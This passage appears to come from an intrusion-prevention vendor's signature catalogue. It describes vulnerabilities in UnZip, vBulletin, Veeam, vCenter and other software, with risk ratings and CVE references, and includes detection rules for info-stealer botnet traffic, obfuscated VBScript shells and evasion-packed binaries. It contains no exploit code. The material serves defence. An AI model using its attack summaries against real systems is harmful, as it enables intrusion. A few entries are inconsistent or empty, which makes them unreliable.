Situation:	HTTP_CSH-Unusual-IP-Address-Format-Used-In-HTTP-Request

Unzip-Extra-Field-Uncompressed-Size-Buffer-Overflow

About this vulnerability:

A vulnerability in Info-ZIP UnZip

Risk:

High

First detected in:

sgpkg-ips-637-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Info-ZIP UnZip

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Info-ZIP UnZip tool. The vulnerability is due to insufficient bounds checking on user-supplied input while handling ZIP files. Specifically, a crafted ZIP archive containing uncompressed size in extra fields that are smaller than the corresponding compressed data sizes in the archive file will trigger a heap buffer overflow. A remote unauthenticated attacker can exploit these vulnerabilities by enticing a target user to open a crafted ZIP archive with the "-t" option. Successful exploitation would crash the program, resulting in a denial of service condition or possibly arbitrary code execution.

Situation:

File-Zip_Unzip-Extra-Field-Uncompressed-Size-Buffer-Overflow

References:

CVE-2014-9636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9636

BID-71825
http://www.securityfocus.com/bid/71825

OSVDB-114423
http://www.osvdb.org/114423

UPnP-IGD-Apple-Mac-OSX-mDNSResponder-Compromise

About this vulnerability:

A code execution vulnerability in Apple Mac OS X mDNSResponder

Risk:

Moderate

First detected in:

sgpkg-ips-150-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

<os>

Type:

Buffer Overflow

Description:

mDNSResponder in Apple Mac OS X suffers from a buffer overflow vulnerability related to parsing crafted UPnP IGD packets. Remote attackers can use the vulnerability to execute arbitrary code on the vulnerable system.

Situation:

Generic_UDP-UPnP-IGD-Apple-Mac-OSX-mDNSResponder-Compromise

References:

CVE-2007-2386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2386

BID-24144
http://www.securityfocus.com/bid/24144

OSVDB-35142
http://www.osvdb.org/35142

UPX-Packed-ELF-Executable

About this vulnerability:	A suspicious executable file was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1221-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Backdoor
Description:	An executable file which has been packed with the UPX packer was detected. Software packers are usually used for compressing the contents of an executable to make them smaller. Some malware have been found to use the UPX packer to evade anti-malware software.
Situation:	File-Binary_UPX-Packed-ELF-Executable

UPX-Packed-Executable

About this vulnerability:	A suspicious executable file was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1119-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	An executable file which has been packed with the UPX packer was detected. Software packers are usually used for compressing the contents of an executable to make them smaller. Some malware have been found to use the UPX packer to evade anti-malware software.
Situation:	File-Exe_UPX-Packed-Executable

Use-After-Free-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1690

About this vulnerability:

An attempt to exploit a vulnerability in ksmbd detected

Risk:

High

First detected in:

sgpkg-ips-1541-5242

Last changed:

sgpkg-ips-1542-5242

Platform:

Linux

Software:

ksmbd

Type:

Use-after-free

Description:

The flaw exists within the processing of SMB2_TREE_DISCONNECT commands in SMB Kernel Server ksmbd. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the kernel.

Situation:

SMB-TCP_Use-After-Free-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1690

References:

CVE-2022-47939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47939

Ustorekeeper-Cgi-File-Disclosure

About this vulnerability:

ustorekeeper.pl arbitrary file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

uStorekeeper

Type:

Directory Traversal

Description:

uStorekeeper.pl has a directory traversal vulnerability. This allows a remote user to read arbitrary files from the server.

References:

CVE-2001-0466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0466

uTorrent-Announce-Url-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in uTorrent

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

uTorrent

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in uTorrent. By persuading a target user to open a crafted torrent file that has an excessivley long announce URL with a vulnerable application, a remote attacker can compromise the user's system.

Situation:

HTTP_SS-uTorrent-Announce-Url-Buffer-Overflow

References:

CVE-2007-0927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0927

BID-22530
http://www.securityfocus.com/bid/22530

OSVDB-33180
http://www.osvdb.org/33180

UUSee-Streaming-Media

About this vulnerability:	UUSee streaming media client
Risk:	Low
First detected in:	sgpkg-ips-183-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	UUSee
Type:	Streaming Media
Description:	UUSee is a streaming media client.
Situation:	HTTP_CSH-UUSee-Activity

V-CMS-PHP-File-Upload-And-Execute-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in V-CMS 1.0 PHP File Upload detected

Risk:

High

First detected in:

sgpkg-ips-655-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

V-CMS PHP

Type:

Input Validation

Description:

A vulnerability in the V-CMS 1.0 PHP inline image upload feature which allows remote attackers to upload and execute any arbitrary script and execute it with a GET request, due to a failure of inline_image_upload.php to check the file type.

Situation:

HTTP_CS-V-CMS-PHP-File-Upload-And-Execute-Vulnerability

References:

CVE-2011-4828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4828

BID-50706
http://www.securityfocus.com/bid/50706

OSVDB-77183
http://www.osvdb.org/77183

Valmet-DNA-Predictable-Key-Remote-Code-Execution

About this vulnerability:

Remote code execution vulnerability in Valmet DNA

Risk:

Moderate

First detected in:

sgpkg-ips-1520-5242

Last changed:

sgpkg-ips-1520-5242

Platform:

Generic

Software:

<os>

Type:

Insecure Configuration

Description:

There is a remote code execution vulnerability in the Valmet DNA service running in port TCP/1517. Using a predictable encryption key, an attacker can trigger commands that will be executed on the remote machine with the SYSTEM privileges.

Situation:

Generic_CS-Valmet-DNA-Predictable-Key-Usage

References:

CVE-2021-26726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26726

Valve-Steam-Usage

About this vulnerability:	Valve Steam protocol usage
Risk:	Low
First detected in:	sgpkg-ips-206-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Valve Steam
Type:	Online Game
Description:	Steam is a online gaming protocol developed by Valve and it is included in various games such as Half Life 2. It is used to control registration and upgrades of the installed games as well as to provide additional services such as instant messaging.
Situation:	Generic_UDP-Valve-Steam-Usage HTTP_CSH-Valve-Steam-Usage

Vandyke-AbsoluteFTP-Buffer-Overflow

About this vulnerability:

A Vandyke AbsoluteFTP Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

VanDyke AbsoluteFTP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in VanDyke AbsoluteFTP, versions 1.9.6 through 2.2.10, which allows remote attackers to execute arbitrary code via a crafted file name in a LIST command response.

Situation:

FTP_SS-Vandyke-AbsoluteFTP-Buffer-Overflow

References:

CVE-2011-5164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5164

BID-50614
http://www.securityfocus.com/bid/50614

OSVDB-77105
http://www.osvdb.org/77105

Vandyke-Securecrt-Configuration-Folder-Vulnerability

About this vulnerability:

A vulnerability in VanDyke Software SecureCRT

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VanDyke SecureCRT

Type:

Input Validation

Description:

There is a vulnerability in the way VanDyke SecureCRT handles telnet URLs. Through the use of a telnet URL, SecureCRT can be remotely supplied a parameter which can be used to specify an arbitrary configuration folder; this configuration folder can reside on a remote shared resource. Because a configuration file can reference script code, an attacker can exploit this vulnerability to execute code on the vulnerable system in the context of the currently logged in user. In an attack case, the vulnerable application will start unexpectedly and attempt to establish a telnet session with a remote server. Any malicious script code referenced by the non-default configuration folder will be executed in the background without any warnings or user interaction. Further behaviour of the attack target is entirely dependent on the nature of the executed code. The code is executed in the security context of the currently logged in user.

Situation:

File-Text_Vandyke-Securecrt-Configuration-Folder-Vulnerability

References:

CVE-2004-1541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1541

BID-11731
http://www.securityfocus.com/bid/11731

Vandyke-Securecrt-SSH-Client-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Van Dyke SecureCRT SSH Client.

Risk:

High

First detected in:

sgpkg-ips-663-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

VanDyke SecureCRT

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Van Dyke SecureCRT SSH Client, before 3.4.6 and 4.x before 4.0 beta 3, which allows remote attackers to execute arbitrary code via a long SSH1 protocol version string.

Situation:

SSH_Vandyke-Securecrt-SSH-Client-Buffer-Overflow

References:

CVE-2002-1059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1059

BID-5287
http://www.securityfocus.com/bid/5287

OSVDB-4991
http://www.osvdb.org/4991

Vandyke-Vshell-Server-Trigger-Command-Injection

About this vulnerability:

A vulnerability in VanDyke VShell

Risk:

High

First detected in:

sgpkg-ips-1479-5242

Last changed:

sgpkg-ips-1479-5242

Platform:

Generic

Software:

VanDyke VShell

Type:

Input Validation

Description:

A command injection vulnerability has been reported in VanDyke VShell Server. The vulnerability is caused by insufficient sanitization of input passed to trigger action commands. A remote attacker can exploit this vulnerability by sending crafted traffic to the target server. Successful exploitation could result in command injection.

Situation:

FTP_CS-Vandyke-Vshell-Server-Trigger-Command-Injection
HTTP_CRL-Vandyke-Vshell-Server-Trigger-Command-Injection

References:

CVE-2022-28054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28054

Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service

About this vulnerability:

An attempt to exploit a vulnerability in Varnish Cache detected

Risk:

High

First detected in:

sgpkg-ips-1733-5242

Last changed:

sgpkg-ips-1762-5242

Platform:

Linux; Unix

Software:

Varnish Cache

Type:

Resource Starvation

Description:

A vulnerability in Varnish Cache, versions 6.0.x LTS before 6.0.13, 7.3.x before 7.3.2, 7.4.x before 7.4.3, Enterprise 6.0.x up to 6.0.12r5, which allows remote attackers to cause a denial of service condition by sending crafted requests to the target server, due to improper handling of HTTP/2 connections flow control.

Situation:

HTTP2_SETTINGS-Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service
HTTP_CSH-Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service

References:

CVE-2024-30156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30156

Vawtrak-Botnet

About this vulnerability:	Vawtrak botnet
Risk:	High
First detected in:	sgpkg-ips-650-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	Vawtrak is a malicious botnet which poses a serious threat to Internet users. Most notably, Vawtrak engages in trojan activity as an information stealer and a tool to commit banking fraud. In addition, it may download further malicious modules. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation:	HTTP_CSH-Vawtrak-Botnet-Traffic File-Text_Vawtrak-Botnet-Traffic

VBScript-File-Transfer

About this vulnerability:	A transfer of a VBScript file detected
Risk:	High
First detected in:	sgpkg-ips-1857-5242
Last changed:	sgpkg-ips-1857-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	VBScript has been commonly used by malicious actors to distribute malware onto victims' computers. Thus, by blocking VBScript files, we effectively reduce one malware infection vector.
Situation:	File-Member-Name_VBScript-File-Transfer File-Name_VBScript-File-Transfer

VBScript-In-Insecure-Frameworks

About this vulnerability:	VBScript script use in insecure web frameworks
Risk:	Moderate
First detected in:	sgpkg-ips-892-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	VBscript use in the open web is near obsolete these days. Most of the utilization happens within legacy Intranet apps and for providing script functions for legacy browsers. Yet VBScript is very commonly used as an attack vector on the Internet. These situations can detect vbscript usage in some most commonly exploited web applications targeted by known exploit kits.
Situation:	File-Text_VBScript-In-Bo-Bbs File-Text_VBScript-In-Wordpress

VBScript-Scripting-Detected

About this vulnerability:	VBScript scripting used
Risk:	Moderate
First detected in:	sgpkg-ips-470-5211
Last changed:	sgpkg-ips-1771-5242
Platform:	Windows
Software:	Internet Explorer
Type:	Insecure Configuration
Description:	VBScript scripting used
Situation:	File-Text_Outdated-Browser-VBScript-Scripting-Detected File-Text_Reverse-Obfuscated-Script File-Text_Obfuscated-VBScript-Detected File-Text_Obfuscated-VBScript-Char-Execute-Detected File-Text_Obfuscated-VBScript-Shell-Detected File-Text_VBScript-Scripting-Detected

VBScript_Engine_Use_After_Free_Vulnerability_CVE-2019-1485

About this vulnerability:

A vulnerability in VBScript Engine

Risk:

High

First detected in:

sgpkg-ips-1209-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Use-after-free

Description:

There exists a use after free vulnerability in VBScript Engine. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_VBScript_Engine_Use_After_Free_Vulnerability_CVE-2019-1485

References:

CVE-2019-1485
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1485

ms19-dec
http://technet.microsoft.com/security/bulletin/ms19-dec

vBSEO-Remote-PHP-Code-Injection

About this vulnerability:

A vBSEO Remote PHP Code Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

vBSEO

Type:

Input Validation

Description:

A vulnerability in vBSEO, versions 3.6.0 and before, that allows remote attackers to execute arbitrary PHP code via the char_repl parameter, using complex curly syntax, to a POST method.

Situation:

File-Text_vBSEO-Remote-PHP-Code-Injection

References:

CVE-2012-5223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5223

BID-51647
http://www.securityfocus.com/bid/51647

OSVDB-78508
http://www.osvdb.org/78508

VBulletin-Arbitrary-Code-Execution

About this vulnerability:

A VBulletin Arbitrary Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-734-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vBulletin

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in vBulletin, versions 3.0.6 and earlier, which allows remote attackers to execute arbitrary PHP code via nested variables in the template parameter.

Situation:

Generic_MySQL-MaxDB-WebDBM-BOF

References:

CVE-2005-0511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0511

BID-12622
http://www.securityfocus.com/bid/12622

OSVDB-14047
http://www.osvdb.org/14047

VBulletin-Formudisplay-Php-Script-Execution

About this vulnerability:

Script execution vulnerability in vBulletin Forumdisplay.php

Risk:

Moderate

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vBulletin

Type:

Malfunction

Description:

The PHP-based vBulletin Web forum contains a code execution flaw in the forumdisplay.php script. A remote attacker could execute arbitrary commands on the vulnerable server via the comma parameter. Several preconditions exist for the vulnerability, which makes it harder to exploit.

Situation:

HTTP_CSU-VBulletin-Forumdisplay-Php-Script-Execution

References:

CVE-2005-0429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0429

BID-12542
http://www.securityfocus.com/bid/12542

VBulletin-nodeid-SQL-Injection

About this vulnerability:

A VBulletin nodeid SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-781-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vBulletin

Type:

SQL Injection

Description:

A vulnerability in vBulletin, vesions 5.0.0 Beta 11 through 5.0.0 Beta 28, which allows remote attackers to extract the web application's usernames and hashes and authenticate to the vBulletin admin control panel.

Situation:

HTTP_CRL-VBulletin-nodeid-SQL-Injection

References:

CVE-2013-3522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3522

BID-58754
http://www.securityfocus.com/bid/58754

OSVDB-92031
http://www.osvdb.org/92031

VBulletin-nodeid-SQL-Injection-CVE-2020-12720

About this vulnerability:

A vulnerability in VBulletin

Risk:

High

First detected in:

sgpkg-ips-1252-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vBulletin

Type:

Malfunction

Description:

There exists an SQL injection vulnerability in vBulletin software. Successful exploitation allows remote attackers to extract the admin user's token to access the vBulletin control panel.

Situation:

HTTP_CRL-VBulletin-nodeid-SQL-Injection-CVE-2020-12720

References:

CVE-2020-12720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12720

VBulletin-PHP-Object-Injection

About this vulnerability:

A VBulletin PHP Object Injection vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vBulletin

Type:

PHP Injection

Description:

A vulnerability in vBulletin, versions 5.1.2 - 5.1.9, which allows remote attackers to perform a PHP object injection and execute arbitrary PHP code via a crafted serialized object inf the argument parameter to /decodeArguments.

Situation:

HTTP_CSU-VBulletin-PHP-Object-Injection

References:

CVE-2015-7808
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808

VBulletin-Remote-Code-Execution-5.6.x

About this vulnerability:

A vulnerability in vBulletin

Risk:

High

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

vBulletin

Type:

Malfunction

Description:

There exists a pre-auth remote code execution vulnerability in the versions 5.6.0, 5.6.1 and 5.6.2 of vBulletin forum software. Successful exploitation leads in arbitrary code execution.

Situation:

HTTP_CRL-VBulletin-Remote-Code-Execution-5.6.x

References:

CVE-2020-17496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17496

VBulletin-Remote-Code-Execution-CVE-2019-16759

About this vulnerability:

A vulnerability in vBulletin

Risk:

High

First detected in:

sgpkg-ips-1193-5242

Last changed:

sgpkg-ips-1652-5242

Platform:

Linux

Software:

vBulletin

Type:

Malfunction

Description:

There exists a pre-auth remote code execution vulnerability in vBulletin software. Successful exploitation leads in arbitrary code execution.

References:

CVE-2019-16759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759

VBulletin-Routestring-Unauthenticated-Remote-Code-Execution

About this vulnerability:	An Unauthenticated Remote Code Execution vulnerability in VBulletin.
Risk:	Moderate
First detected in:	sgpkg-ips-1028-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	vBulletin
Type:	Directory Traversal
Description:	There has been reported a vulnerability in vBulletin version 5, which allows remote attackers to execute arbitrary PHP code via a routestring parameter.
Situation:	HTTP_CSU-VBulletin-Routestring-Unauthenticated-Remote-Code-Execution

VBulletin-widgetConfig-RCE

About this vulnerability:

A vulnerability in vBulletin

Risk:

High

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Unix

Software:

vBulletin

Type:

Code Injection

Description:

There exists a vulnerability in vBulletin, versions 5.x through 5.5.4, which allows remote attackers to execute arbitrary code due to unsufficient sanitization of the widgetConfig parameter in an ajax/render/widget_php routestring POST request.

Situation:

HTTP_CRL-VBulletin-widgetConfig-RCE

References:

CVE-2019-16759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759

Vcenter-Server-Arbitrary-File-Upload-CVE-2021-22005

About this vulnerability:

An attempt to exploit a vulnerability in vCenter Server detected

Risk:

High

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

VMware vCenter Server

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in vCenter Server Arbitrary File Upload CVE-2021-22005 detected.

Situation:

HTTP_CRL-Vcenter-Server-Arbitrary-File-Upload-CVE-2021-22005

References:

CVE-2021-22005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005

Vcenter-Server-VSAN-Health-Check-RCE-CVE-2021-21985

About this vulnerability:

An attempt to exploit a vulnerability in vCenter Server detected

Risk:

High

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

VMware vCenter Server

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in vCenter Server VSAN Health Check RCE CVE-2021-21985 detected.

Situation:

HTTP_CRL-Vcenter-Server-VSAN-Health-Check-RCE-CVE-2021-21985

References:

CVE-2021-21985
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985

Veeam-Backup-And-Replication-Authentication-Bypass-CVE-2022-26501

About this vulnerability:

A vulnerability in Veeam Backup and Replication

Risk:

High

First detected in:

sgpkg-ips-1460-5242

Last changed:

sgpkg-ips-1460-5242

Platform:

Generic

Software:

Veeam Backup and Replication

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Veeam Backup and Replication. The vulnerability is due to lack of authorization when accessing an internal API service. A remote, unauthenticated attacker could exploit this vulnerability by authenticating to the target service with an NTLM anonymous session. Successful exploitation could lead to remote code execution on the target server.

Situation:

Generic_CS-Veeam-Backup-And-Replication-Authentication-Bypass-CVE-2022-26501

References:

CVE-2022-26501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26501

Veeam-Backup-And-Replication-CDbCryptoKeyInfo-Insecure-Deserialization

About this vulnerability:	An attempt to exploit a vulnerability in Veeam Backup and Replication detected
Risk:	High
First detected in:	sgpkg-ips-1855-5242
Last changed:	sgpkg-ips-1855-5242
Platform:	Generic
Software:	Veeam Backup and Replication
Type:	Input Validation
Description:	Multiple insecure deserialization vulnerabilities have been reported in Veeam Backup and Replication (e.g., CVE-2024-40711, CVE-2024-42455, and CVE-2025-23120). One of their exploit vectors is through the "Veeam.Backup.Model.CDbCryptoKeyInfo" class. This fingerprint aims to detect such exploits.
Situation:	Generic_CS-Veeam-Backup-And-Replication-CDbCryptoKeyInfo-Insecure-Deserialization

Veeam-Backup-And-Replication-Cproxybinaryformatter-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Veeam Backup and Replication

Risk:

Moderate

First detected in:

sgpkg-ips-1821-5242

Last changed:

sgpkg-ips-1821-5242

Platform:

Generic

Software:

Veeam Backup and Replication

Type:

Input Validation

Description:

Improper validation of user-submitted serialized objects causes a file deletion vulnerability in Veeam. A successful exploitation allows an attacker to remotely delete arbitrary files on the target system.

Situation:

Generic_CS-Veeam-Backup-And-Replication-Cproxybinaryformatter-Arbitrary-File-Deletion

References:

CVE-2024-42455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42455

Veeam-Backup-And-Replication-Credential-Disclosure-CVE-2023-27532

About this vulnerability:

A vulnerability in Veeam Backup and Replication

Risk:

High

First detected in:

sgpkg-ips-1571-5242

Last changed:

sgpkg-ips-1571-5242

Platform:

Generic

Software:

Veeam Backup and Replication

Type:

Insecure Configuration

Description:

A credential disclosure vulnerability has been reported in Veeam Backup and Replication. The vulnerability is due to lack of authorization when accessing a remote Windows Communication Foundation service. Successful exploitation could allow an unauthenticated attacker to retrieve unencrypted credentials from the target server and possibly execute arbitrary code.

Situation:

Generic_CS-Veeam-Backup-And-Replication-Credential-Disclosure-CVE-2023-27532

References:

CVE-2023-27532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27532

Veeam-Backup-And-Replication-FindValidSTSEndpointUrl-Authentication-Bypass

About this vulnerability:

An attempt to exploit a vulnerability in Veeam Backup Enterprise Manager detected

Risk:

High

First detected in:

sgpkg-ips-1737-5242

Last changed:

sgpkg-ips-1737-5242

Platform:

Generic

Software:

Veeam Backup and Replication

Type:

Insecure Configuration

Description:

A vulnerability in Veeam Backup Enterprise Manager, Veeam Backup and Replication 12.1 prior to 12.1.2.172, which allows remote attackers to bypass authentication by sending crafted requests to the target server, due to mishandling of user supplied data.

Situation:

HTTP_CRL-Veeam-Backup-And-Replication-FindValidSTSEndpointUrl-Authentication-Bypass

References:

CVE-2024-29849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29849

Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2024-40711

About this vulnerability:

A vulnerability in Veeam Backup and Replication

Risk:

Critical

First detected in:

sgpkg-ips-1784-5242

Last changed:

sgpkg-ips-1784-5242

Platform:

Generic

Software:

Veeam Backup and Replication

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Veeam Backup and Replication. The vulnerability is due to improper validation of user submitted serialized objects in the Deserialize method of CProxyBinaryFormatter class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.

Situation:

Generic_CS-Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2024-40711

References:

CVE-2024-40711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-40711

Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2025-23120

About this vulnerability:

A vulnerability in Veeam Backup and Replication

Risk:

Critical

First detected in:

sgpkg-ips-1853-5242

Last changed:

sgpkg-ips-1853-5242

Platform:

Generic

Software:

Veeam Backup and Replication

Type:

Input Validation

Description:

Situation:

Generic_CS-Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2025-23120

References:

CVE-2025-23120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23120

Veeam-One-Agent-Deserialization

About this vulnerability:

A vulnerability in Veeam ONE.

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Windows

Software:

Veeam ONE

Type:

Input Validation

Description:

A vulnerability in Veeam ONE, versions before hotfix 9.5.5.4587, and 10.0.1.750 in the 9 and 10 release lines, which allows remote attackers to execute arbitrary commands by forcing the agent to deserialize untrusted data by a failure in the handshake method.

Situation:

Generic_CS-Veeam-One-Agent-Deserialization

References:

CVE-2020-10914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10914

Veeam-One-Reporter-importlicense-Page_Load-XML-External-Entity-Injection

About this vulnerability:

A vulnerability in Veeam ONE

Risk:

Moderate

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veeam ONE

Type:

Input Validation

Description:

There exists an XML external entity injection vulnerability in Veeam ONE. Successful exploitation could lead in disclosure of files of the target system.

Situation:

HTTP_CRL-Veeam-One-Reporter-importlicense-Page_Load-XML-External-Entity-Injection

References:

CVE-2020-15419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15419

Veeam-One-Ssrsreport-Getcustomelementtext-Xml-External-Entity-Injection

About this vulnerability:

A vulnerability in Veeam ONE

Risk:

High

First detected in:

sgpkg-ips-1286-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veeam ONE

Type:

Input Validation

Description:

An XML external entity injection vulnerability exists in Veeam ONE. The vulnerability is due to insufficient handling of XML external entities in requests submitted to the server. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation will result in disclosure of arbitrary file contents in the security context of SYSTEM.

Situation:

HTTP_CRL-Veeam-One-Ssrsreport-Getcustomelementtext-Xml-External-Entity-Injection

References:

CVE-2020-15418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15418

Veertu-Anka-Build-Service-Directory-Traversal

About this vulnerability:

A vulnerability in Veertu Anka Build

Risk:

Moderate

First detected in:

sgpkg-ips-1804-5242

Last changed:

sgpkg-ips-1804-5242

Platform:

Generic

Software:

Veertu Anka Build

Type:

Directory Traversal

Description:

Improper validation of the service parameter used in the archive API endpoint causes a directory traversal vulnerability in Veertu Anka Build. A successful exploitation allows an attacker to read arbitrary files on the target system.

Situation:

HTTP_CRL-Veertu-Anka-Build-Service-Directory-Traversal

References:

CVE-2024-41163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41163

Vegadns-Axfr_Get-Command-Injection

About this vulnerability:	A vulnerability in VegaDNS VegaDNS
Risk:	Moderate
First detected in:	sgpkg-ips-841-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	VegaDNS
Type:	Input Validation
Description:	Improper handling of client-supplied parameters results in a command injection vulnerability in the axfr_get.php script of VegaDNS. A successful exploitation allows an attacker to run arbitrary commands on the target system.
Situation:	HTTP_CRL-Vegadns-Axfr_Get-Command-Injection

Veil-Evading-Binary

About this vulnerability:	An executable file generated with Veil Evasion framework
Risk:	High
First detected in:	sgpkg-ips-803-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A file with matching characteristics of Veil obfuscated exploit payloads.
Situation:	File-Exe_Veil-Evading-Binary-1 File-Exe_Veil-Evading-Binary-3 File-Exe_Veil-Evading-Binary-2 File-Exe_Veil-Evading-Binary-4

Vercel-Next.js-Improper-URL-Handling-Denial-of-Service

About this vulnerability:

A vulnerability in the Next.js React framework.

Risk:

High

First detected in:

sgpkg-ips-1439-5242

Last changed:

sgpkg-ips-1439-5242

Platform:

Linux;Unix

Software:

Vercel Next.js

Type:

Malfunction

Description:

A vulnerability in Vercel Next.js, versions 11.1.0 and above prior to 12.0.5, which allows remote attackers to create a denial of service condition by sending a request containing a maliciously crafted URL to a Next.js server, due to insufficient error handling when processing certain URLs.

Situation:

HTTP_CS-Vercel-Next.js-Improper-URL-Handling-Denial-of-Service

References:

CVE-2021-43803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43803

Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow

